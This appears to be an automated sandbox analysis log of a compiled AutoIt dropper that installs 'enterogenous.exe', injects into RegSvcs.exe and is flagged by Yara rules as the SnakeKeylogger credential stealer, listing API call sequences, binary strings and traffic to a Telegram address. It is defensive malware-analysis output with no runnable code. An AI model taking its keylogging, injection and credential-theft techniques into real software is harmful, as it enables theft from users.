                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49853 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49969 version: TLS 1.2
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_0058EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0058EAFF
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_0058ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0058ED6A
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00AAED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_00AAED6A
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_0058EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0058EAFF
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_0057AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_0057AA57
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_005A9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_005A9576
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00AC9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_00AC9576

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 6.2.enterogenous.exe.3b50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.enterogenous.exe.3b50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.enterogenous.exe.3b50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.2.enterogenous.exe.3b50000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.enterogenous.exe.3b50000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.enterogenous.exe.3b50000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 2.2.enterogenous.exe.4370000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 2.2.enterogenous.exe.4370000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 2.2.enterogenous.exe.4370000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 2.2.enterogenous.exe.4370000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 2.2.enterogenous.exe.4370000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 2.2.enterogenous.exe.4370000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: Process Memory Space: enterogenous.exe PID: 7460, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: RegSvcs.exe PID: 7496, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: enterogenous.exe PID: 7760, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Binary is likely a compiled AutoIt script file
                  Source: ty1nyFUMlo.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: ty1nyFUMlo.exe, 00000000.00000003.1368764291.0000000003EA1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_de1b3d78-4
                  Source: ty1nyFUMlo.exe, 00000000.00000003.1368764291.0000000003EA1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_c9496dba-6
                  Source: ty1nyFUMlo.exe, 00000000.00000000.1343887602.00000000005D2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_5ca27e0a-9
                  Source: ty1nyFUMlo.exe, 00000000.00000000.1343887602.00000000005D2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_971ccf92-4
                  Source: enterogenous.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: enterogenous.exe, 00000002.00000002.1407526648.0000000000AF2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c2342c4b-f
                  Source: enterogenous.exe, 00000002.00000002.1407526648.0000000000AF2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_246e6e1d-f
                  Source: enterogenous.exe, 00000006.00000002.1565408285.0000000000AF2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_2ce99d2f-2
                  Source: enterogenous.exe, 00000006.00000002.1565408285.0000000000AF2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_ae0ea951-8
                  Source: ty1nyFUMlo.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_cca75cd1-b
                  Source: ty1nyFUMlo.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_cf886f48-3
                  Source: enterogenous.exe.0.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a43ab9a3-8
                  Source: enterogenous.exe.0.drString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_bb1ec916-0
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_0057D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_0057D5EB
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_00571201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00571201
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_0057E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0057E8F6
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A9E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_00A9E8F6
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_0051BF400_2_0051BF40
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_005820460_2_00582046
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_005180600_2_00518060
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_005782980_2_00578298
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_0054E4FF0_2_0054E4FF
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_0054676B0_2_0054676B
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_005A48730_2_005A4873
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_0051CAF00_2_0051CAF0
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_0053CAA00_2_0053CAA0
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_0052CC390_2_0052CC39
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_00546DD90_2_00546DD9
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_0052B1190_2_0052B119
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_005191C00_2_005191C0
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_005313940_2_00531394
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_005317060_2_00531706
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_0053781B0_2_0053781B
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_0052997D0_2_0052997D
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_005179200_2_00517920
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_005319B00_2_005319B0
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_00537A4A0_2_00537A4A
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_00531C770_2_00531C77
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_00537CA70_2_00537CA7
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_0059BE440_2_0059BE44
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_00549EEE0_2_00549EEE
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_00531F320_2_00531F32
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_01721E800_2_01721E80
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A380602_2_00A38060
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00AA20462_2_00AA2046
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A982982_2_00A98298
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A6E4FF2_2_00A6E4FF
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A6676B2_2_00A6676B
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00AC48732_2_00AC4873
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A5CAA02_2_00A5CAA0
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A3CAF02_2_00A3CAF0
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A4CC392_2_00A4CC39
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A66DD92_2_00A66DD9
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A4D0642_2_00A4D064
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A391C02_2_00A391C0
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A4B1192_2_00A4B119
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A513942_2_00A51394
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A517062_2_00A51706
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A5781B2_2_00A5781B
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A519B02_2_00A519B0
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A379202_2_00A37920
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A4997D2_2_00A4997D
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A57A4A2_2_00A57A4A
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A57CA72_2_00A57CA7
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A51C772_2_00A51C77
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A69EEE2_2_00A69EEE
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00ABBE442_2_00ABBE44
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A51F322_2_00A51F32
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_016300D82_2_016300D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_030D53623_2_030D5362
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_030DD2783_2_030DD278
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_030D71183_2_030D7118
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_030DC1483_2_030DC148
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_030DA0883_2_030DA088
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_030DC7383_2_030DC738
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_030DC4683_2_030DC468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_030DCA083_2_030DCA08
